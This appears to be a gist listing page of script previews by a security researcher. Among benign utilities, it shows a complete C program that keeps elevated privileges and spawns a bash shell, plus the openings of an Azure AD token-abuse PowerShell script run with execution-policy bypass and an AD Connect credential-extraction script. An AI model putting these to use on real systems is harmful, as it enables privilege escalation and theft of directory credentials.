This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <sys/types.h> | |
#include <unistd.h> | |
int main(void){ | |
setreuid(geteuid(),-1); | |
setregid(getegid(),-1); | |
char *args[] = {"/bin/bash",0}; | |
execve(args[0],args,0); | |
return 0; | |
} | |
/* gcc uidswap.c -o uidswap && ./uidswap */ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#+-------------------------------------------------------------------+ | |
#| = : = : = : = : = : = : = : = : = : = : = : = : = : = : = : = : = | | |
#|{>/-------------------------------------------------------------\<}| | |
#|: | Author: Aman Dhally | |
#| :| Email: amandhally@gmail.com | |
#| :| Web: www.amandhally.net/blog | |
#| :| blog: http://newdelhipowershellusergroup.blogspot.com/ | |
#| :| | |
#|: | Purpose: | |
#| :| Clean lapopt using removing un-wantede files |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python3 | |
# -*- coding: utf-8 -*- | |
# | |
# Copyright 2020, Photubias <tijl.deneut@howest.be> | |
# | |
# Licensed under the Apache License, Version 2.0 (the "License"); | |
# you may not use this file except in compliance with the License. | |
# You may obtain a copy of the License at | |
# | |
# http://www.apache.org/licenses/LICENSE-2.0 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python3 | |
# -*- coding: utf-8 -*- | |
# | |
# Copyright 2020, Photubias <tijl.deneut@howest.be> | |
# | |
# Licensed under the Apache License, Version 2.0 (the "License"); | |
# you may not use this file except in compliance with the License. | |
# You may obtain a copy of the License at | |
# | |
# http://www.apache.org/licenses/LICENSE-2.0 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
# Created by Korey McKinley, Senior Security Consulant at LMG Security | |
# https://lmgsecurity.com | |
# July 12, 2019 | |
# Converted to Python3 by Tijl Deneut | |
# August 8, 2021 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## Written by Photubias, based on https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/ | |
## Example: powershell -ep bypass .\RequestPRTToken.ps1 | |
[CmdletBinding()] | |
Param ( | |
[Parameter(Mandatory=$True,Position=1)]$Nonce | |
) | |
## Example of a nonce: AQABAAAAAABeStGSRwwnTq2vHplZ9KL4zgnsAt1Vyqx2sMVQVwgmP4MYzWWJfjDXR9L2Jhc2lMCpYpyuFvqYQfHUwEMbVpk1woEIESAbkX-EdIr2ZpDtWiAA | |
#$nonce = 'AQABAAAAAABeStGSRwwnTq2vHplZ9KL4zgnsAt1Vyqx2sMVQVwgmP4MYzWWJfjDXR9L2Jhc2lMCpYpyuFvqYQfHUwEMbVpk1woEIESAbkX-EdIr2ZpDtWiAA' | |
#$query = '{"method": "GetCookies", "sender": "https://login.microsoftonline.com", "uri": "https://login.microsoftonline.com/common/oauth2/authorize?client_id=4345a7b9-9a63-4910-a426-35363201d503&response_mode=form_post&response_type=code+id_token&scope=openid+profile&state=OpenIdConnect.AuthenticationProperties%3dhiUgyLP6LnqNTRRyNpT0W1WGjOO_9hNAUjayiM5WJb0wwdAK0fwF635Dw5XStDKDP9EV_AeGIuWqN_rtyrl8m9t6pUGiXHhG3GMSSpW-AWcpfxW9D6bmWECYrN36_9zw&nonce=636957966885511040.YmI2MDIxNmItZDA0Yy00MjZlLThlYjAtYjNk |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env bash | |
# My bash Script to convert mp4 to mp3 | |
# By NerdJK23 & Photubias | |
# web: www.computingforgeeks.com | |
# email: kiplangatmtai@gmail.com | |
# Requires | |
# ffmpeg installed | |
# lame installed |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Write-Host "AD Connect Sync Credential Extract v3 (@_xpn_ & @tijldeneut)" | |
Write-Host "`t[ Updated to support new cryptokey storage method ]" | |
Write-Host "`t[ Updated to support Server 2019's new instance name ]`n" | |
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync" | |
try { | |
$client.Open() | |
} catch { | |
Write-Host "[!] Could not connect to localdb with ADSync, trying ADSync2019..." |